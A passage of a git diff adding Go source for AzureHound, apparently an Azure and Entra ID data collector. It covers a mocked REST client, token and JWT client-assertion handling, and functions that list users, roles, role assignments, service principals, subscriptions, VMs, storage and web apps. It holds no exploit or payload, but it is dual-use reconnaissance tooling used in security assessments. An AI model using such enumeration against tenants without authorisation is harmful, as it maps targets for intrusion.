"Authenticate", reflect.TypeOf((*MockRestClient)(nil).Authenticate)) +} + +// CloseIdleConnections mocks base method. +func (m *MockRestClient) CloseIdleConnections() { + m.ctrl.T.Helper() + m.ctrl.Call(m, "CloseIdleConnections") +} + +// CloseIdleConnections indicates an expected call of CloseIdleConnections. +func (mr *MockRestClientMockRecorder) CloseIdleConnections() *gomock.Call { + mr.mock.ctrl.T.Helper() + return mr.mock.ctrl.RecordCallWithMethodType(mr.mock, "CloseIdleConnections", reflect.TypeOf((*MockRestClient)(nil).CloseIdleConnections)) +} + +// Delete mocks base method. +func (m *MockRestClient) Delete(arg0 context.Context, arg1 string, arg2 interface{}, arg3 query.Params, arg4 map[string]string) (*http.Response, error) { + m.ctrl.T.Helper() + ret := m.ctrl.Call(m, "Delete", arg0, arg1, arg2, arg3, arg4) + ret0, _ := ret[0].(*http.Response) + ret1, _ := ret[1].(error) + return ret0, ret1 +} + +// Delete indicates an expected call of Delete. +func (mr *MockRestClientMockRecorder) Delete(arg0, arg1, arg2, arg3, arg4 interface{}) *gomock.Call { + mr.mock.ctrl.T.Helper() + return mr.mock.ctrl.RecordCallWithMethodType(mr.mock, "Delete", reflect.TypeOf((*MockRestClient)(nil).Delete), arg0, arg1, arg2, arg3, arg4) +} + +// Get mocks base method. +func (m *MockRestClient) Get(arg0 context.Context, arg1 string, arg2 query.Params, arg3 map[string]string) (*http.Response, error) { + m.ctrl.T.Helper() + ret := m.ctrl.Call(m, "Get", arg0, arg1, arg2, arg3) + ret0, _ := ret[0].(*http.Response) + ret1, _ := ret[1].(error) + return ret0, ret1 +} + +// Get indicates an expected call of Get. +func (mr *MockRestClientMockRecorder) Get(arg0, arg1, arg2, arg3 interface{}) *gomock.Call { + mr.mock.ctrl.T.Helper() + return mr.mock.ctrl.RecordCallWithMethodType(mr.mock, "Get", reflect.TypeOf((*MockRestClient)(nil).Get), arg0, arg1, arg2, arg3) +} + +// Patch mocks base method. +func (m *MockRestClient) Patch(arg0 context.Context, arg1 string, arg2 interface{}, arg3 query.Params, arg4 map[string]string) (*http.Response, error) { + m.ctrl.T.Helper() + ret := m.ctrl.Call(m, "Patch", arg0, arg1, arg2, arg3, arg4) + ret0, _ := ret[0].(*http.Response) + ret1, _ := ret[1].(error) + return ret0, ret1 +} + +// Patch indicates an expected call of Patch. +func (mr *MockRestClientMockRecorder) Patch(arg0, arg1, arg2, arg3, arg4 interface{}) *gomock.Call { + mr.mock.ctrl.T.Helper() + return mr.mock.ctrl.RecordCallWithMethodType(mr.mock, "Patch", reflect.TypeOf((*MockRestClient)(nil).Patch), arg0, arg1, arg2, arg3, arg4) +} + +// Post mocks base method. +func (m *MockRestClient) Post(arg0 context.Context, arg1 string, arg2 interface{}, arg3 query.Params, arg4 map[string]string) (*http.Response, error) { + m.ctrl.T.Helper() + ret := m.ctrl.Call(m, "Post", arg0, arg1, arg2, arg3, arg4) + ret0, _ := ret[0].(*http.Response) + ret1, _ := ret[1].(error) + return ret0, ret1 +} + +// Post indicates an expected call of Post. +func (mr *MockRestClientMockRecorder) Post(arg0, arg1, arg2, arg3, arg4 interface{}) *gomock.Call { + mr.mock.ctrl.T.Helper() + return mr.mock.ctrl.RecordCallWithMethodType(mr.mock, "Post", reflect.TypeOf((*MockRestClient)(nil).Post), arg0, arg1, arg2, arg3, arg4) +} + +// Put mocks base method. +func (m *MockRestClient) Put(arg0 context.Context, arg1 string, arg2 interface{}, arg3 query.Params, arg4 map[string]string) (*http.Response, error) { + m.ctrl.T.Helper() + ret := m.ctrl.Call(m, "Put", arg0, arg1, arg2, arg3, arg4) + ret0, _ := ret[0].(*http.Response) + ret1, _ := ret[1].(error) + return ret0, ret1 +} + +// Put indicates an expected call of Put. +func (mr *MockRestClientMockRecorder) Put(arg0, arg1, arg2, arg3, arg4 interface{}) *gomock.Call { + mr.mock.ctrl.T.Helper() + return mr.mock.ctrl.RecordCallWithMethodType(mr.mock, "Put", reflect.TypeOf((*MockRestClient)(nil).Put), arg0, arg1, arg2, arg3, arg4) +} + +// Send mocks base method. +func (m *MockRestClient) Send(arg0 *http.Request) (*http.Response, error) { + m.ctrl.T.Helper() + ret := m.ctrl.Call(m, "Send", arg0) + ret0, _ := ret[0].(*http.Response) + ret1, _ := ret[1].(error) + return ret0, ret1 +} + +// Send indicates an expected call of Send. +func (mr *MockRestClientMockRecorder) Send(arg0 interface{}) *gomock.Call { + mr.mock.ctrl.T.Helper() + return mr.mock.ctrl.RecordCallWithMethodType(mr.mock, "Send", reflect.TypeOf((*MockRestClient)(nil).Send), arg0) +} diff --git a/client/rest/token.go b/client/rest/token.go new file mode 100644 index 0000000..16e9257 --- /dev/null +++ b/client/rest/token.go @@ -0,0 +1,58 @@ +// Copyright (C) 2022 Specter Ops, Inc. +// +// This file is part of AzureHound. +// +// AzureHound is free software: you can redistribute it and/or modify +// it under the terms of the GNU General Public License as published by +// the Free Software Foundation, either version 3 of the License, or +// (at your option) any later version. +// +// AzureHound is distributed in the hope that it will be useful, +// but WITHOUT ANY WARRANTY; without even the implied warranty of +// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the +// GNU General Public License for more details. +// +// You should have received a copy of the GNU General Public License +// along with this program. If not, see . + +package rest + +import ( + "encoding/json" + "fmt" + "time" +) + +type Token struct { + accessToken string + expiresIn int + extExpiresIn int + expires time.Time +} + +func (s Token) IsExpired() bool { + return time.Now().After(s.expires.Add(-10 * time.Second)) +} + +func (s Token) String() string { + return fmt.Sprintf("Bearer %s", s.accessToken) +} + +func (s *Token) UnmarshalJSON(data []byte) error { + var res struct { + AccessToken string `json:"access_token"` // The token to use in calls to Microsoft Graph API + ExpiresIn int `json:"expires_in"` // How long the access token is valid in seconds + ExtExpiresIn int `json:"ext_expires_in"` // How long the access token is valid in seconds + TokenType string `json:"token_type"` // Indicates the token type value. The only type currently supported by Azure AD is `bearer` + } + + if err := json.Unmarshal(data, &res); err != nil { + return err + } else { + s.accessToken = res.AccessToken + s.expiresIn = res.ExpiresIn + s.extExpiresIn = res.ExtExpiresIn + s.expires = time.Now().Add(time.Duration(res.ExpiresIn) * time.Second) + return nil + } +} diff --git a/client/rest/utils.go b/client/rest/utils.go new file mode 100644 index 0000000..ed3b85e --- /dev/null +++ b/client/rest/utils.go @@ -0,0 +1,152 @@ +// Copyright (C) 2022 Specter Ops, Inc. +// +// This file is part of AzureHound. +// +// AzureHound is free software: you can redistribute it and/or modify +// it under the terms of the GNU General Public License as published by +// the Free Software Foundation, either version 3 of the License, or +// (at your option) any later version. +// +// AzureHound is distributed in the hope that it will be useful, +// but WITHOUT ANY WARRANTY; without even the implied warranty of +// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the +// GNU General Public License for more details. +// +// You should have received a copy of the GNU General Public License +// along with this program. If not, see . + +package rest + +import ( + "bytes" + "crypto/sha1" + "crypto/x509" + "encoding/base64" + "encoding/json" + "encoding/pem" + "fmt" + "io" + "math" + "net/http" + "strings" + "time" + + "github.com/gofrs/uuid" + "github.com/golang-jwt/jwt" + "github.com/youmark/pkcs8" +) + +func Decode(body io.ReadCloser, v interface{}) error { + defer body.Close() + defer io.ReadAll(body) // must read all; streaming to the json decoder does not read to EOF making the connection unavailable for reuse + return json.NewDecoder(body).Decode(v) +} + +func NewClientAssertion(tokenUrl string, clientId string, clientCert string, signingKey string, keyPassphrase string) (string, error) { + if key, err := parseRSAPrivateKey(signingKey, keyPassphrase); err != nil { + return "", fmt.Errorf("Unable to parse private key: %w", err) + } else if jti, err := uuid.NewV4(); err != nil { + return "", fmt.Errorf("Unable to generate JWT ID: %w", err) + } else if thumbprint, err := x5t(clientCert); err != nil { + return "", fmt.Errorf("Unable to create X.509 certificate thumbprint: %w", err) + } else { + iat := time.Now() + exp := iat.Add(1 * time.Minute) + token := jwt.NewWithClaims(jwt.SigningMethodRS256, jwt.StandardClaims{ + Audience: tokenUrl, + ExpiresAt: exp.Unix(), + Issuer: clientId, + Id: jti.String(), + NotBefore: iat.Unix(), + Subject: clientId, + IssuedAt: iat.Unix(), + }) + + token.Header = map[string]interface{}{ + "alg": "RS256", + "typ": "JWT", + "x5t": thumbprint, + } + + if signedToken, err := token.SignedString(key); err != nil { + return "", fmt.Errorf("Unable to sign JWT: %w", err) + } else { + return signedToken, nil + } + } +} + +func ParseBody(accessToken string) (map[string]interface{}, error) { + var ( + body = make(map[string]interface{}) + parts = strings.Split(accessToken, ".") + ) + + if len(parts) != 3 { + return body, fmt.Errorf("invalid access token") + } else if bytes, err := base64.RawStdEncoding.DecodeString(parts[1]); err != nil { + return body, err + } else if err := json.Unmarshal(bytes, &body); err != nil { + return body, err + } else { + return body, nil + } +} + +func ParseAud(accessToken string) (string, error) { + if body, err := ParseBody(accessToken); err != nil { + return "", err + } else if aud, ok := body["aud"].(string); !ok { + return "", fmt.Errorf("invalid 'aud' type: %T", body["aud"]) + } else { + return strings.TrimSuffix(aud, "/"), nil + } +} + +func parseRSAPrivateKey(signingKey string, password string) (interface{}, error) { + if decodedBlock, _ := pem.Decode([]byte(signingKey)); decodedBlock == nil { + return nil, fmt.Errorf("Unable to decode private key") + } else if key, _, err := pkcs8.ParsePrivateKey(decodedBlock.Bytes, []byte(password)); err != nil { + return nil, err + } else { + return key, nil + } +} + +func x5t(certificate string) (string, error) { + if decoded, _ := pem.Decode([]byte(certificate)); decoded == nil { + return "", fmt.Errorf("Unable to decode certificate") + } else if cert, err := x509.ParseCertificate(decoded.Bytes); err != nil { + return "", fmt.Errorf("Unable to parse certificate: %w", err) + } else { + checksum := sha1.Sum(cert.Raw) + return base64.StdEncoding.EncodeToString(checksum[:]), nil + } +} + +func IsClosedConnectionErr(err error) bool { + var closedConnectionMsg = "An existing connection was forcibly closed by the remote host." + closedFromClient := strings.Contains(err.Error(), closedConnectionMsg) + // Mocking http.Do would require a larger refactor, so closedFromTestCase is used to cover testing only. + closedFromTestCase := strings.HasSuffix(err.Error(), ": EOF") + return closedFromClient || closedFromTestCase +} + +func ExponentialBackoff(retry int) { + backoff := math.Pow(5, float64(retry+1)) + time.Sleep(time.Second * time.Duration(backoff)) +} + +func CopyBody(req *http.Request) ([]byte, error) { + var ( + body []byte + err error + ) + if req.Body != nil { + body, err = io.ReadAll(req.Body) + if body != nil { + req.Body = io.NopCloser(bytes.NewBuffer(body)) + } + } + return body, err +} diff --git a/client/role_assignments.go b/client/role_assignments.go new file mode 100644 index 0000000..f742f54 --- /dev/null +++ b/client/role_assignments.go @@ -0,0 +1,55 @@ +// Copyright (C) 2022 Specter Ops, Inc. +// +// This file is part of AzureHound. +// +// AzureHound is free software: you can redistribute it and/or modify +// it under the terms of the GNU General Public License as published by +// the Free Software Foundation, either version 3 of the License, or +// (at your option) any later version. +// +// AzureHound is distributed in the hope that it will be useful, +// but WITHOUT ANY WARRANTY; without even the implied warranty of +// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the +// GNU General Public License for more details. +// +// You should have received a copy of the GNU General Public License +// along with this program. If not, see . + +package client + +import ( + "context" + "fmt" + + "github.com/bloodhoundad/azurehound/v2/client/query" + "github.com/bloodhoundad/azurehound/v2/constants" + "github.com/bloodhoundad/azurehound/v2/models/azure" +) + +// ListAzureADRoleAssignments https://learn.microsoft.com/en-us/graph/api/rbacapplication-list-roleassignments?view=graph-rest-beta +func (s *azureClient) ListAzureADRoleAssignments(ctx context.Context, params query.GraphParams) <-chan AzureResult[azure.UnifiedRoleAssignment] { + var ( + out = make(chan AzureResult[azure.UnifiedRoleAssignment]) + path = fmt.Sprintf("/%s/roleManagement/directory/roleAssignments", constants.GraphApiVersion) + ) + + if params.Top == 0 { + params.Top = 999 + } + + go getAzureObjectList[azure.UnifiedRoleAssignment](s.msgraph, ctx, path, params, out) + return out +} + +// ListRoleAssignmentsForResource https://learn.microsoft.com/en-us/rest/api/authorization/role-assignments/list-for-resource?view=rest-authorization-2015-07-01 +func (s *azureClient) ListRoleAssignmentsForResource(ctx context.Context, resourceId string, filter, tenantId string) <-chan AzureResult[azure.RoleAssignment] { + var ( + out = make(chan AzureResult[azure.RoleAssignment]) + path = fmt.Sprintf("%s/providers/Microsoft.Authorization/roleAssignments", resourceId) + params = query.RMParams{ApiVersion: "2015-07-01", Filter: filter, TenantId: tenantId} + ) + + go getAzureObjectList[azure.RoleAssignment](s.resourceManager, ctx, path, params, out) + + return out +} diff --git a/client/roles.go b/client/roles.go new file mode 100644 index 0000000..6299ef2 --- /dev/null +++ b/client/roles.go @@ -0,0 +1,39 @@ +// Copyright (C) 2022 Specter Ops, Inc. +// +// This file is part of AzureHound. +// +// AzureHound is free software: you can redistribute it and/or modify +// it under the terms of the GNU General Public License as published by +// the Free Software Foundation, either version 3 of the License, or +// (at your option) any later version. +// +// AzureHound is distributed in the hope that it will be useful, +// but WITHOUT ANY WARRANTY; without even the implied warranty of +// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the +// GNU General Public License for more details. +// +// You should have received a copy of the GNU General Public License +// along with this program. If not, see . + +package client + +import ( + "context" + "fmt" + + "github.com/bloodhoundad/azurehound/v2/client/query" + "github.com/bloodhoundad/azurehound/v2/constants" + "github.com/bloodhoundad/azurehound/v2/models/azure" +) + +// ListAzureADRoles https://learn.microsoft.com/en-us/graph/api/rbacapplication-list-roledefinitions?view=graph-rest-beta +func (s *azureClient) ListAzureADRoles(ctx context.Context, params query.GraphParams) <-chan AzureResult[azure.Role] { + var ( + out = make(chan AzureResult[azure.Role]) + path = fmt.Sprintf("/%s/roleManagement/directory/roleDefinitions", constants.GraphApiVersion) + ) + + go getAzureObjectList[azure.Role](s.msgraph, ctx, path, params, out) + + return out +} diff --git a/client/service_principals.go b/client/service_principals.go new file mode 100644 index 0000000..0c56e8c --- /dev/null +++ b/client/service_principals.go @@ -0,0 +1,60 @@ +// Copyright (C) 2022 Specter Ops, Inc. +// +// This file is part of AzureHound. +// +// AzureHound is free software: you can redistribute it and/or modify +// it under the terms of the GNU General Public License as published by +// the Free Software Foundation, either version 3 of the License, or +// (at your option) any later version. +// +// AzureHound is distributed in the hope that it will be useful, +// but WITHOUT ANY WARRANTY; without even the implied warranty of +// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the +// GNU General Public License for more details. +// +// You should have received a copy of the GNU General Public License +// along with this program. If not, see . + +package client + +import ( + "context" + "encoding/json" + "fmt" + + "github.com/bloodhoundad/azurehound/v2/client/query" + "github.com/bloodhoundad/azurehound/v2/constants" + "github.com/bloodhoundad/azurehound/v2/models/azure" +) + +// ListAzureADServicePrincipals https://learn.microsoft.com/en-us/graph/api/serviceprincipal-list?view=graph-rest-beta +func (s *azureClient) ListAzureADServicePrincipals(ctx context.Context, params query.GraphParams) <-chan AzureResult[azure.ServicePrincipal] { + var ( + out = make(chan AzureResult[azure.ServicePrincipal]) + path = fmt.Sprintf("/%s/servicePrincipals", constants.GraphApiVersion) + ) + + if params.Top == 0 { + params.Top = 999 + } + + go getAzureObjectList[azure.ServicePrincipal](s.msgraph, ctx, path, params, out) + + return out +} + +// ListAzureADServicePrincipalOwners https://learn.microsoft.com/en-us/graph/api/serviceprincipal-list-owners?view=graph-rest-beta +func (s *azureClient) ListAzureADServicePrincipalOwners(ctx context.Context, objectId string, params query.GraphParams) <-chan AzureResult[json.RawMessage] { + var ( + out = make(chan AzureResult[json.RawMessage]) + path = fmt.Sprintf("/%s/servicePrincipals/%s/owners", constants.GraphApiBetaVersion, objectId) + ) + + if params.Top == 0 { + params.Top = 999 + } + + go getAzureObjectList[json.RawMessage](s.msgraph, ctx, path, params, out) + + return out +} diff --git a/client/storage_accounts.go b/client/storage_accounts.go new file mode 100644 index 0000000..402d247 --- /dev/null +++ b/client/storage_accounts.go @@ -0,0 +1,56 @@ +// Copyright (C) 2022 Specter Ops, Inc. +// +// This file is part of AzureHound. +// +// AzureHound is free software: you can redistribute it and/or modify +// it under the terms of the GNU General Public License as published by +// the Free Software Foundation, either version 3 of the License, or +// (at your option) any later version. +// +// AzureHound is distributed in the hope that it will be useful, +// but WITHOUT ANY WARRANTY; without even the implied warranty of +// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the +// GNU General Public License for more details. +// +// You should have received a copy of the GNU General Public License +// along with this program. If not, see . + +package client + +import ( + "context" + "fmt" + + "github.com/bloodhoundad/azurehound/v2/client/query" + "github.com/bloodhoundad/azurehound/v2/models/azure" +) + +// ListAzureStorageAccounts https://learn.microsoft.com/en-us/rest/api/storagerp/storage-accounts/list?view=rest-storagerp-2022-05-01 +func (s *azureClient) ListAzureStorageAccounts(ctx context.Context, subscriptionId string) <-chan AzureResult[azure.StorageAccount] { + var ( + out = make(chan AzureResult[azure.StorageAccount]) + path = fmt.Sprintf("/subscriptions/%s/providers/Microsoft.Storage/storageAccounts", subscriptionId) + params = query.RMParams{ApiVersion: "2022-05-01"} + ) + + go getAzureObjectList[azure.StorageAccount](s.resourceManager, ctx, path, params, out) + + return out +} + +// == +// Storage containers +// == + +// ListAzureStorageContainers https://learn.microsoft.com/en-us/rest/api/storagerp/blob-containers/list?view=rest-storagerp-2022-05-01 +func (s *azureClient) ListAzureStorageContainers(ctx context.Context, subscriptionId string, resourceGroupName string, saName string, filter string, includeDeleted string, maxPageSize string) <-chan AzureResult[azure.StorageContainer] { + var ( + out = make(chan AzureResult[azure.StorageContainer]) + path = fmt.Sprintf("/subscriptions/%s/resourceGroups/%s/providers/Microsoft.Storage/storageAccounts/%s/blobServices/default/containers", subscriptionId, resourceGroupName, saName) + params = query.RMParams{ApiVersion: "2022-05-01", Filter: filter, IncludeDeleted: includeDeleted, MaxPageSize: maxPageSize} + ) + + go getAzureObjectList[azure.StorageContainer](s.resourceManager, ctx, path, params, out) + + return out +} diff --git a/client/subscriptions.go b/client/subscriptions.go new file mode 100644 index 0000000..0ed8933 --- /dev/null +++ b/client/subscriptions.go @@ -0,0 +1,38 @@ +// Copyright (C) 2022 Specter Ops, Inc. +// +// This file is part of AzureHound. +// +// AzureHound is free software: you can redistribute it and/or modify +// it under the terms of the GNU General Public License as published by +// the Free Software Foundation, either version 3 of the License, or +// (at your option) any later version. +// +// AzureHound is distributed in the hope that it will be useful, +// but WITHOUT ANY WARRANTY; without even the implied warranty of +// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the +// GNU General Public License for more details. +// +// You should have received a copy of the GNU General Public License +// along with this program. If not, see . + +package client + +import ( + "context" + + "github.com/bloodhoundad/azurehound/v2/client/query" + "github.com/bloodhoundad/azurehound/v2/models/azure" +) + +// ListAzureSubscriptions https://learn.microsoft.com/en-us/rest/api/subscription/subscriptions/list?view=rest-subscription-2020-01-01 +func (s *azureClient) ListAzureSubscriptions(ctx context.Context) <-chan AzureResult[azure.Subscription] { + var ( + out = make(chan AzureResult[azure.Subscription]) + path = "/subscriptions" + params = query.RMParams{ApiVersion: "2020-01-01"} + ) + + go getAzureObjectList[azure.Subscription](s.resourceManager, ctx, path, params, out) + + return out +} diff --git a/client/tenants.go b/client/tenants.go new file mode 100644 index 0000000..4aa8966 --- /dev/null +++ b/client/tenants.go @@ -0,0 +1,72 @@ +// Copyright (C) 2022 Specter Ops, Inc. +// +// This file is part of AzureHound. +// +// AzureHound is free software: you can redistribute it and/or modify +// it under the terms of the GNU General Public License as published by +// the Free Software Foundation, either version 3 of the License, or +// (at your option) any later version. +// +// AzureHound is distributed in the hope that it will be useful, +// but WITHOUT ANY WARRANTY; without even the implied warranty of +// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the +// GNU General Public License for more details. +// +// You should have received a copy of the GNU General Public License +// along with this program. If not, see . + +package client + +import ( + "context" + "fmt" + + "github.com/bloodhoundad/azurehound/v2/client/query" + "github.com/bloodhoundad/azurehound/v2/client/rest" + "github.com/bloodhoundad/azurehound/v2/constants" + "github.com/bloodhoundad/azurehound/v2/models/azure" +) + +func (s *azureClient) GetAzureADOrganization(ctx context.Context, selectCols []string) (*azure.Organization, error) { + var ( + path = fmt.Sprintf("/%s/organization", constants.GraphApiVersion) + response azure.OrganizationList + ) + if res, err := s.msgraph.Get(ctx, path, query.GraphParams{Select: selectCols}, nil); err != nil { + return nil, err + } else if err := rest.Decode(res.Body, &response); err != nil { + return nil, err + } else { + return &response.Value[0], nil + } +} + +func (s *azureClient) GetAzureADTenants(ctx context.Context, includeAllTenantCategories bool) (azure.TenantList, error) { + var ( + path = "/tenants" + params = query.RMParams{ApiVersion: "2020-01-01", IncludeAllTenantCategories: includeAllTenantCategories} + headers map[string]string + response azure.TenantList + ) + + if res, err := s.resourceManager.Get(ctx, path, params, headers); err != nil { + return response, err + } else if err := rest.Decode(res.Body, &response); err != nil { + return response, err + } else { + return response, nil + } +} + +// ListAzureADTenants https://learn.microsoft.com/en-us/rest/api/subscription/tenants/list?view=rest-subscription-2020-01-01 +func (s *azureClient) ListAzureADTenants(ctx context.Context, includeAllTenantCategories bool) <-chan AzureResult[azure.Tenant] { + var ( + out = make(chan AzureResult[azure.Tenant]) + path = "/tenants" + params = query.RMParams{ApiVersion: "2020-01-01", IncludeAllTenantCategories: includeAllTenantCategories} + ) + + go getAzureObjectList[azure.Tenant](s.resourceManager, ctx, path, params, out) + + return out +} diff --git a/client/users.go b/client/users.go new file mode 100644 index 0000000..d20f4bf --- /dev/null +++ b/client/users.go @@ -0,0 +1,43 @@ +// Copyright (C) 2022 Specter Ops, Inc. +// +// This file is part of AzureHound. +// +// AzureHound is free software: you can redistribute it and/or modify +// it under the terms of the GNU General Public License as published by +// the Free Software Foundation, either version 3 of the License, or +// (at your option) any later version. +// +// AzureHound is distributed in the hope that it will be useful, +// but WITHOUT ANY WARRANTY; without even the implied warranty of +// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the +// GNU General Public License for more details. +// +// You should have received a copy of the GNU General Public License +// along with this program. If not, see . + +package client + +import ( + "context" + "fmt" + + "github.com/bloodhoundad/azurehound/v2/client/query" + "github.com/bloodhoundad/azurehound/v2/constants" + "github.com/bloodhoundad/azurehound/v2/models/azure" +) + +// ListAzureADUsers https://learn.microsoft.com/en-us/graph/api/user-list?view=graph-rest-beta +func (s *azureClient) ListAzureADUsers(ctx context.Context, params query.GraphParams) <-chan AzureResult[azure.User] { + var ( + out = make(chan AzureResult[azure.User]) + path = fmt.Sprintf("/%s/users", constants.GraphApiVersion) + ) + + if params.Top == 0 { + params.Top = 999 + } + + go getAzureObjectList[azure.User](s.msgraph, ctx, path, params, out) + + return out +} diff --git a/client/virtual_machines.go b/client/virtual_machines.go new file mode 100644 index 0000000..673d36c --- /dev/null +++ b/client/virtual_machines.go @@ -0,0 +1,42 @@ +// Copyright (C) 2022 Specter Ops, Inc. +// +// This file is part of AzureHound. +// +// AzureHound is free software: you can redistribute it and/or modify +// it under the terms of the GNU General Public License as published by +// the Free Software Foundation, either version 3 of the License, or +// (at your option) any later version. +// +// AzureHound is distributed in the hope that it will be useful, +// but WITHOUT ANY WARRANTY; without even the implied warranty of +// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the +// GNU General Public License for more details. +// +// You should have received a copy of the GNU General Public License +// along with this program. If not, see . + +package client + +import ( + "context" + "fmt" + + "github.com/bloodhoundad/azurehound/v2/client/query" + "github.com/bloodhoundad/azurehound/v2/models/azure" +) + +// ListAzureVirtualMachines https://learn.microsoft.com/en-us/rest/api/compute/virtual-machines/list-all?view=rest-compute-2021-07-01 +func (s *azureClient) ListAzureVirtualMachines(ctx context.Context, subscriptionId string, params query.RMParams) <-chan AzureResult[azure.VirtualMachine] { + var ( + out = make(chan AzureResult[azure.VirtualMachine]) + path = fmt.Sprintf("/subscriptions/%s/providers/Microsoft.Compute/virtualMachines", subscriptionId) + ) + + if params.ApiVersion == "" { + params.ApiVersion = "2021-07-01" + } + + go getAzureObjectList[azure.VirtualMachine](s.resourceManager, ctx, path, params, out) + + return out +} diff --git a/client/vm_scale_sets.go b/client/vm_scale_sets.go new file mode 100644 index 0000000..8ac1e42 --- /dev/null +++ b/client/vm_scale_sets.go @@ -0,0 +1,39 @@ +// Copyright (C) 2022 Specter Ops, Inc. +// +// This file is part of AzureHound. +// +// AzureHound is free software: you can redistribute it and/or modify +// it under the terms of the GNU General Public License as published by +// the Free Software Foundation, either version 3 of the License, or +// (at your option) any later version. +// +// AzureHound is distributed in the hope that it will be useful, +// but WITHOUT ANY WARRANTY; without even the implied warranty of +// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the +// GNU General Public License for more details. +// +// You should have received a copy of the GNU General Public License +// along with this program. If not, see . + +package client + +import ( + "context" + "fmt" + + "github.com/bloodhoundad/azurehound/v2/client/query" + "github.com/bloodhoundad/azurehound/v2/models/azure" +) + +// ListAzureVMScaleSets https://learn.microsoft.com/en-us/rest/api/compute/virtual-machine-scale-sets/list-all?view=rest-compute-2022-11-01 +func (s *azureClient) ListAzureVMScaleSets(ctx context.Context, subscriptionId string) <-chan AzureResult[azure.VMScaleSet] { + var ( + out = make(chan AzureResult[azure.VMScaleSet]) + path = fmt.Sprintf("/subscriptions/%s/providers/Microsoft.Compute/virtualMachineScaleSets", subscriptionId) + params = query.RMParams{ApiVersion: "2022-11-01"} + ) + + go getAzureObjectList[azure.VMScaleSet](s.resourceManager, ctx, path, params, out) + + return out +} diff --git a/client/web_apps.go b/client/web_apps.go new file mode 100644 index 0000000..4ae12fc --- /dev/null +++ b/client/web_apps.go @@ -0,0 +1,39 @@ +// Copyright (C) 2022 Specter Ops, Inc. +// +// This file is part of AzureHound. +// +// AzureHound is free software: you can redistribute it and/or modify +// it under the terms of the GNU General Public License as published by +// the Free Software Foundation, either version 3 of the License, or +// (at your option) any later version. +// +// AzureHound is distributed in the hope that it will be useful, +// but WITHOUT ANY WARRANTY; without even the implied warranty of +// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the +// GNU General Public License for more details. +// +// You should have received a copy of the GNU General Public License +// along with this program. If not, see . + +package client + +import ( + "context" + "fmt" + + "github.com/bloodhoundad/azurehound/v2/client/query" + "github.com/bloodhoundad/azurehound/v2/models/azure" +) + +// ListAzureWebApps https://learn.microsoft.com/en-us/rest/api/appservice/web-apps/list?view=rest-appservice-2022-03-01 +func (s *azureClient) ListAzureWebApps(ctx context.Context, subscriptionId string) <-chan AzureResult[azure.WebApp] { + out := make(chan AzureResult[azure.WebApp]) + var ( + path = fmt.Sprintf("/subscriptions/%s/providers/Microsoft.Web/sites", subscriptionId) + params = query.RMParams{ApiVersion: "2022-03-01"} + ) + + go getAzureObjectList[azure.WebApp](s.resourceManager, ctx, path, params, out) + + return out +} diff --git a/cmd/configure.go b/cmd/configure.go new file mode 100644 index 0000000..f845bdc --- /dev/null +++ b/cmd/configure.go @@ -0,0 +1,295 @@ +// Copyright (C) 2022 Specter Ops, Inc. +// +// This file is part of AzureHound. +// +// AzureHound is free software: you can redistribute it and/or modify +// it under the terms of the GNU General Public License as published by +// the Free Software Foundation, either version 3 of the License, or +// (at your option) any later version. +// +// AzureHound is distributed in the hope that it will be useful, +// but WITHOUT ANY WARRANTY; without even the implied warranty of +// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the +// GNU General Public License for more details. +// +// You should have received a copy of the GNU General Public License +// along with this program. If not, see . + +package cmd + +import ( + "bytes" + "crypto/rand" + "crypto/rsa" + "crypto/x509" + "crypto/x509/pkix" + "encoding/pem" + "errors" + "fmt" + "io/ioutil" + "math" + "math/big" + + "net/mail" + "net/url" + "os" + "path/filepath" + "time" + + "github.com/bloodhoundad/azurehound/v2/config" + "github.com/bloodhoundad/azurehound/v2/enums" + "github.com/gofrs/uuid" + "github.com/manifoldco/promptui" + "github.com/spf13/cobra" + "github.com/spf13/viper" + "github.com/youmark/pkcs8" +) + +func init() { + rootCmd.AddCommand(configureCmd) +} + +var configureCmd = &cobra.Command{ + Use: "configure", + Short: "Configure AzureHound", + Run: configureCmdImpl, + SilenceUsage: true, +} + +func configureCmdImpl(cmd *cobra.Command, args []string) { + if err := configure(); err != nil { + exit(fmt.Errorf("failed to configure cobra CLI: %w", err)) + } +} + +func configure() error { + var ( + configFile = config.ConfigFile.Value().(string) + configDir = filepath.Dir(configFile) + genCert bool + genCertPath = filepath.Join(configDir, "cert.pem") + genKeyPath = filepath.Join(configDir, "key.pem") + ) + + // Configure Azure connection + if _, region, err := choose("Azure Region", config.AzRegions, 1); err != nil { + return err + } else if tenantId, err := prompt("Directory (tenant) ID", validateGuid, false); err != nil { + return err + } else if appId, err := prompt("Application (client) ID", validateGuid, false); err != nil { + return err + } else if _, authMethod, err := choose("Authentication Method", enums.AuthMethods(), 0); err != nil { + return err + } else { + config.AzRegion.Set(region) + config.AzTenant.Set(tenantId) + config.AzAppId.Set(appId) + + if authMethod == enums.Certificate { + if genCert = confirm("Generate Certificate and Key", true); genCert { + if keyPass, err := prompt("Private Key Passphrase (optional)", nil, true); err != nil { + return err + } else { + config.AzCert.Set(genCertPath) + config.AzKey.Set(genKeyPath) + config.AzKeyPass.Set(keyPass) + } + } else if certPath, err := prompt("Public Certificate Path", validatePem, false); err != nil { + return err + } else if keyPath, err := prompt("Private Key Path", validatePem, false); err != nil { + return err + } else if keyPass, err := prompt("Private Key Passphrase (optional)", nil, true); err != nil { + return err + } else { + config.AzCert.Set(certPath) + config.AzKey.Set(keyPath) + config.AzKeyPass.Set(keyPass) + } + } else if authMethod == enums.UsernamePassword { + if upn, err := prompt("Input the User Principal Name", validateUserPrincipalName, false); err != nil { + return err + } else if password, err := prompt("Input the password", nil, true); err != nil { + return err + } else { + config.AzUsername.Set(upn) + config.AzPassword.Set(password) + } + } else if secret, err := prompt("Client Secret", nil, true); err != nil { + return err + } 